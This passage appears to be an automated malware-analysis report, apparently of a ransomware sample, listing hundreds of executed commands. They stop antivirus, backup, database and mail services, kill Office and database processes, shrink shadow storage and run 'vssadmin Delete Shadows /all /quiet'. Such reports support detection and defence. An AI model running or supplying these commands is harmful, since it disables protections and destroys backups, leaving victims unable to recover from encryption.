  • '%WINDIR%\syswow64\cmd.exe' /C net stop PDVFSService /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop KAVFS /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop wbengine /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop SQLAgent$VEEAMSQL2008R2 /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop "Sophos Message Router" /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop kavfsslp /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM sqlagent.exe /F' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop "Sophos MCS Client" /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop SQLAgent$BKUPEXEC /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop SQLTELEMETRY /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop “Veeam Backup Catalog Data Service” /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop masvc /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSSQLFDLauncher$SYSTEM_BGC /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop sophossps /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM mysqld.exe /F' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop SQLTELEMETRY$ECWDB2 /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop "Sophos Device Control Service" /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop TrueKeyScheduler /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop "Sophos MCS Agent" /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop SAVService /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM steam.exe /F' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop VeeamCloudSvc /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop SmcService /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop swi_update /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop SDRSVC /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop AcronisAgent /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop swi_filter /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop SstpSvc /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop VeeamDeploySvc /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM mspub.exe /F' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop VeeamCatalogSvc /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop VeeamBackupSvc /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM oomm.exe /F' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop SQLAgent$TPS /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop svcGenericHost /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSSQLFDLauncher /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM powerpnt.exe /F' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSSQL$BKUPEXEC /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop ARSM /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop "Acronis VSS Provider" /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM mydesktopqos.exe /F' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM msftesql.exe /F' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM sqlwriter.exe /F' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSSQLServerADHelper100 /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop EPUpdateService /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop BackupExecAgentBrowser /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop VeeamRESTSvc /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM dbeng50.exe /F' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop swi_update_64 /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop “SQLsafe Filter Service” /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop POP3Svc /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSSQL$VEEAMSQL2008R2 /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop SQLAgent$VEEAMSQL2012 /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop VeeamTransportSvc /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MySQL57 /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM sqboreservie.exe /F' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop "Sophos Clean Service" /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop BackupExecManagementService /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop tmlisten /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop SamSs /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop SQLSERVERAGENT /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop "Sophos Web Control Service" /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop SNAC /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM mbamtray.exe /F' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM syntime.exe /F' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop UI0Detect /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop SQLAgent$TPSAMA /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSSQL$PRACTICEMGT /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSOLAP$SQL_2008 /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM ossd.exe /F' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM dbsnmp.exe /F' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop SQLAgent$SBSMONITORING /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop W3Svc /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop "Sophos System Protection Service" /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop EsgShKernel /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM sqlservr.exe /F' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop SQLSafeOLRService /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop VeeamMountSvc /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop BackupExecVSSProvider /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop "Sophos Safestore Service" /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop klnagent /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop SQLAgent$PROD /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSOLAP$TPS /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop SQLBrowser /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop msftesql$PROD /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MsDtsServer100 /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop FA_Scheduler /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop "Enterprise Client Service" /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop TmCCSF /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop VeeamHvIntegrationSvc /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop McAfeeFramework /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM wordpad.exe /F' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop McAfeeFrameworkMcAfeeFramework /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop DCAgent /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop "SQL Backups" /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSSQL$SHAREPOINT /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop ReportServer$TPS /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop "Symantec System Recovery" /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C vssadmin Delete Shadows /all /quiet' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM oautoupds.exe /F' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM msaess.exe /F' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSExchangeMGMT /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSSQLFDLauncher$SBSMONITORING /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSSQLSERVER /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSExchangeIS /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop BackupExecJobEngine /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop “Acronis VSS Provider” /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM thunderbird.exe /F' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop Smcinst /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop VeeamEnterpriseManagerSvc /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM NTAoSMgr.exe /F' (with hidden window)
Executes the following
  • '%WINDIR%\syswow64\cmd.exe' /C net stop VeeamDeploymentService /y
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM Ntrtsan.exe /F
  • '%WINDIR%\syswow64\net1.exe' stop mfefire /y
  • '%WINDIR%\syswow64\net1.exe' stop SQLAgent$SQLEXPRESS /y
  • '%WINDIR%\syswow64\net1.exe' stop SQLAgent$CXDB /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop SMTPSvc /y
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM infopath.exe /F
  • '%WINDIR%\syswow64\net1.exe' stop VeeamBrokerSvc /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop SQLAgent$SQLEXPRESS /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop mfefire /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop SQLAgent$CXDB /y
  • '%WINDIR%\syswow64\net1.exe' stop MSExchangeES /y
  • '%WINDIR%\syswow64\vssadmin.exe' resize shadowstorage /for=f: /on=f: /maxsize=401MB
  • '%WINDIR%\syswow64\cmd.exe' /C net stop SQLAgent$CITRIX_METAFRAME /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop VeeamBrokerSvc /y
  • '%WINDIR%\syswow64\net1.exe' stop AcrSch2Svc /y
  • '%WINDIR%\syswow64\net1.exe' stop ESHASRV /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop EPSecurityService /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSExchangeES /y
  • '%WINDIR%\syswow64\cmd.exe' /C vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM sqlbrowser.exe /F
  • '%WINDIR%\syswow64\net1.exe' stop "Sophos AutoUpdate Service" /y
  • '%WINDIR%\syswow64\net1.exe' stop McTaskManager /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop AcrSch2Svc /y
  • '%WINDIR%\syswow64\net1.exe' stop EPSecurityService /y
  • '%WINDIR%\syswow64\net1.exe' stop KAVFSGT /y
  • '%WINDIR%\syswow64\net1.exe' stop SMTPSvc /y
  • '%WINDIR%\syswow64\net1.exe' stop SntpService /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSSQL$TPSAMA /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop ReportServer /y
  • '%WINDIR%\syswow64\net1.exe' stop Antivirus /y
  • '%WINDIR%\syswow64\net1.exe' stop BackupExecAgentAccelerator /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSOLAP$SYSTEM_BGC /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop SntpService /y
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM mysqld-nt.exe /F
  • '%WINDIR%\syswow64\net1.exe' stop ekrn /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop BackupExecAgentAccelerator /y
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM thebat64.exe /F
  • '%WINDIR%\syswow64\vssadmin.exe' resize shadowstorage /for=c: /on=c: /maxsize=401MB
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MsDtsServer110 /y
  • '%WINDIR%\syswow64\net1.exe' stop SQLAgent$PRACTTICEBGC /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop Antivirus /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop McShield /y
  • '%WINDIR%\syswow64\net1.exe' stop BackupExecRPCService /y
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM PNTMon.exe /F
  • '%WINDIR%\syswow64\net1.exe' stop SQLAgent$CITRIX_METAFRAME /y
  • '%WINDIR%\syswow64\net1.exe' stop MsDtsServer110 /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop SQLAgent$PRACTTICEBGC /y
  • '%WINDIR%\syswow64\net1.exe' stop SAVAdminService /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop BackupExecRPCService /y
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM onenote.exe /F
  • '%WINDIR%\syswow64\cmd.exe' /C net stop ekrn /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop SAVAdminService /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop ESHASRV /y
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM visio.exe /F
  • '%WINDIR%\syswow64\net1.exe' stop SQLAgent$PRACTTICEMGT /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSSQL$SYSTEM_BGC /y
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM orale.exe /F
  • '%WINDIR%\syswow64\cmd.exe' /C net stop "Sophos Agent" /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop TrueKey /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
  • '%WINDIR%\syswow64\vssadmin.exe' resize shadowstorage /for=d: /on=d: /maxsize=401MB
  • '%WINDIR%\syswow64\cmd.exe' /C net stop RESvc /y
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM tmlisten.exe /F
  • '%WINDIR%\syswow64\net1.exe' stop SQLAgent$SYSTEM_BGC /y
  • '%WINDIR%\syswow64\net1.exe' stop MSSQL$ECWDB2 /y
  • '%WINDIR%\syswow64\net1.exe' stop MSSQL$SYSTEM_BGC /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop SQLWriter /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSSQL$VEEAMSQL2012 /y
  • '%WINDIR%\syswow64\net1.exe' stop NetMsmqActivator /y
  • '%WINDIR%\syswow64\net1.exe' stop MSSQL$TPS /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop SQLAgent$SYSTEM_BGC /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSSQL$ECWDB2 /y
  • '%WINDIR%\syswow64\net1.exe' stop MSSQL$PROFXENGAGEMENT /y
  • '%WINDIR%\syswow64\net1.exe' stop MSSQLFDLauncher$SHAREPOINT /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop NetMsmqActivator /y
  • '%WINDIR%\syswow64\net1.exe' stop VeeamNFSSvc /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSSQL$TPS /y
  • '%WINDIR%\syswow64\net1.exe' stop "Veeam Backup Catalog Data Service" /y
  • '%WINDIR%\syswow64\net1.exe' stop MSSQL$SBSMONITORING /y
  • '%WINDIR%\syswow64\cmd.exe' /C vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
  • '%WINDIR%\syswow64\net1.exe' stop McShield /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop ReportServer$TPSAMA /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop SQLAgent$ECWDB2 /y
  • '%WINDIR%\syswow64\net1.exe' stop TrueKey /y
  • '%WINDIR%\syswow64\net1.exe' stop ReportServer$SQL_2008 /y
  • '%WINDIR%\syswow64\net1.exe' stop MSSQL$SOPHOS /y
  • '%WINDIR%\syswow64\net1.exe' stop IMAP4Svc /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop McTaskManager /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop "Sophos AutoUpdate Service" /y
  • '%WINDIR%\syswow64\cmd.exe' /C vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
  • '%WINDIR%\syswow64\cmd.exe' /C net stop SQLAgent$PRACTTICEMGT /y
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM mydesktopservie.exe /F
  • '%WINDIR%\syswow64\net1.exe' stop MSExchangeMTA /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop ReportServer$SQL_2008 /y
  • '%WINDIR%\syswow64\net1.exe' stop MSSQLFDLauncher$PROFXENGAGEMENT /y
  • '%WINDIR%\syswow64\net1.exe' stop MSSQLServerOLAPService /y
  • '%WINDIR%\syswow64\net1.exe' stop RESvc /y
  • '%WINDIR%\syswow64\net1.exe' stop SQLAgent$ECWDB2 /y
  • '%WINDIR%\syswow64\net1.exe' stop MSSQLFDLauncher$SQL_2008 /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSSQL$SOPHOS /y
  • '%WINDIR%\syswow64\net1.exe' stop MSSQL$VEEAMSQL2012 /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSExchangeMTA /y
  • '%WINDIR%\syswow64\net1.exe' stop ReportServer$TPSAMA /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSSQLServerOLAPService /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSSQLFDLauncher$SQL_2008 /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop KAVFSGT /y
  • '%WINDIR%\syswow64\net1.exe' stop "Sophos Agent" /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop IMAP4Svc /y
  • '%WINDIR%\syswow64\net1.exe' stop SepMasterService /y
  • '%WINDIR%\syswow64\net1.exe' stop AVP /y
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM mysqld-opt.exe /F
  • '%WINDIR%\syswow64\net1.exe' stop MMS /y
  • '%WINDIR%\syswow64\net1.exe' stop MSSQL$SQL_2008 /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop sacsvr /y
  • '%WINDIR%\syswow64\net1.exe' stop MBAMService /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop EraserSvc11710 /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSSQL$SQL_2008 /y
  • '%WINDIR%\syswow64\net1.exe' stop EhttpSrv /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MMS /y
  • '%WINDIR%\syswow64\net1.exe' stop BackupExecDeviceMediaService /y
  • '%WINDIR%\syswow64\net1.exe' stop ShMonitor /y
  • '%WINDIR%\syswow64\net1.exe' stop MSSQLFDLauncher$TPS /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop SQLAgent$PROFXENGAGEMENT /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSSQLFDLauncher$TPSAMA /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop EhttpSrv /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MBAMService /y
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM thebat.exe /F
  • '%WINDIR%\syswow64\cmd.exe' /C net stop ShMonitor /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop BackupExecDeviceMediaService /y
  • '%WINDIR%\syswow64\net1.exe' stop MSSQL$PROD /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSSQLFDLauncher$TPS /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop McAfeeEngineService /y
  • '%WINDIR%\syswow64\net1.exe' stop "Sophos File Scanner Service" /y
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM zoolz.exe /F
  • '%WINDIR%\syswow64\net1.exe' stop McAfeeEngineService /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop mfemms /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop “SQLsafe Backup Service” /y
  • '%WINDIR%\syswow64\net1.exe' stop MBEndpointAgent /y
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM NTAoSMgr.exe /F
  • '%WINDIR%\syswow64\net1.exe' stop “Enterprise Client Service” /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop klnagent /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop AVP /y
  • '%WINDIR%\syswow64\net1.exe' stop OracleClientCache80 /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MBEndpointAgent /y
  • '%WINDIR%\syswow64\net1.exe' stop "Sophos Health Service" /y
  • '%WINDIR%\syswow64\net1.exe' stop MSExchangeSRS /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop “Enterprise Client Service” /y
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM agntsv.exe /F
  • '%WINDIR%\syswow64\net1.exe' stop TrueKeyServiceHelper /y
  • '%WINDIR%\syswow64\net1.exe' stop SQLAgent$PROFXENGAGEMENT /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop OracleClientCache80 /y
  • '%WINDIR%\syswow64\net1.exe' stop "SQLsafe Filter Service" /y
  • '%WINDIR%\syswow64\net1.exe' stop “SQLsafe Backup Service” /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSExchangeSRS /y
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM isqlplussv.exe /F
  • '%WINDIR%\syswow64\net1.exe' stop bedbg /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop WRSVC /y
  • '%WINDIR%\syswow64\net1.exe' stop sacsvr /y
  • '%WINDIR%\syswow64\net1.exe' stop MSSQLFDLauncher$TPSAMA /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop bedbg /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop "SQLsafe Filter Service" /y
  • '%WINDIR%\syswow64\net1.exe' stop WRSVC /y
  • '%WINDIR%\syswow64\net1.exe' stop EraserSvc11710 /y
  • '%WINDIR%\syswow64\net1.exe' stop "Sophos Safestore Service" /y
  • '%WINDIR%\syswow64\net1.exe' stop MSOLAP$TPSAMA /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSSQL$PROD /y
  • '%WINDIR%\syswow64\net1.exe' stop IISAdmin /y
  • '%WINDIR%\syswow64\net1.exe' stop macmnsvc /y
  • '%WINDIR%\syswow64\net1.exe' stop SQLAgent$SHAREPOINT /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MsDtsServer /y
  • '%WINDIR%\syswow64\vssadmin.exe' resize shadowstorage /for=f: /on=f: /maxsize=unbounded
  • '%WINDIR%\syswow64\cmd.exe' /C net stop VSS /y
  • '%WINDIR%\syswow64\cmd.exe' /C vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
  • '%WINDIR%\syswow64\cmd.exe' /C net stop SQLAgent$SOPHOS /y
  • '%WINDIR%\syswow64\vssadmin.exe' resize shadowstorage /for=g: /on=g: /maxsize=unbounded
  • '%WINDIR%\syswow64\cmd.exe' /C net stop SQLAgent$SHAREPOINT /y
  • '%WINDIR%\syswow64\net1.exe' stop MSExchangeSA /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop "SQLsafe Backup Service" /y
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM winword.exe /F
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM ensv.exe /F
  • '%WINDIR%\syswow64\cmd.exe' /C vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM xfssvon.exe /F
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSExchangeSA /y
  • '%WINDIR%\syswow64\net1.exe' stop SQLWriter /y
  • '%WINDIR%\syswow64\net1.exe' stop ReportServer /y
  • '%WINDIR%\syswow64\net1.exe' stop mfemms /y
  • '%WINDIR%\syswow64\net1.exe' stop "SQLsafe Backup Service" /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop IISAdmin /y
  • '%WINDIR%\syswow64\net1.exe' stop MSSQL$TPSAMA /y
  • '%WINDIR%\syswow64\net1.exe' stop MSOLAP$SYSTEM_BGC /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop macmnsvc /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSSQLFDLauncher$SHAREPOINT /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSSQLServerADHelper /y
  • '%WINDIR%\syswow64\net1.exe' stop MsDtsServer /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop SQLAgent$SQL_2008 /y
  • '%WINDIR%\syswow64\net1.exe' stop mozyprobackup /y
  • '%WINDIR%\syswow64\net1.exe' stop MSSQL$SQLEXPRESS /y
  • '%WINDIR%\syswow64\net1.exe' stop MSSQL$PRACTTICEBGC /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSOLAP$TPSAMA /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop "Sophos Safestore Service" /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop "Sophos File Scanner Service" /y
  • '%WINDIR%\syswow64\net1.exe' stop ReportServer$SYSTEM_BGC /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop TrueKeyServiceHelper /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop mozyprobackup /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSSQL$SQLEXPRESS /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop SepMasterService /y
  • '%WINDIR%\syswow64\vssadmin.exe' resize shadowstorage /for=c: /on=c: /maxsize=unbounded
  • '%WINDIR%\syswow64\net1.exe' stop SQLAgent$SOPHOS /y
  • '%WINDIR%\syswow64\net1.exe' stop mfevtp /y
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM tbirdonfig.exe /F
  • '%WINDIR%\syswow64\net1.exe' stop swi_service /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop ReportServer$SYSTEM_BGC /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop swi_service /y
  • '%WINDIR%\syswow64\cmd.exe' /C vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
  • '%WINDIR%\syswow64\net1.exe' stop SQLAgent$SQL_2008 /y
  • '%WINDIR%\syswow64\net1.exe' stop MSSQLServerADHelper /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop mfevtp /y
  • '%WINDIR%\syswow64\net1.exe' stop VSS /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSSQL$PRACTTICEBGC /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop "Sophos Health Service" /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSSQL$PROFXENGAGEMENT /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop W3Svc /y
  • '%WINDIR%\syswow64\net1.exe' stop wbengine /y
  • '%WINDIR%\syswow64\net1.exe' stop SQLAgent$VEEAMSQL2008R2 /y
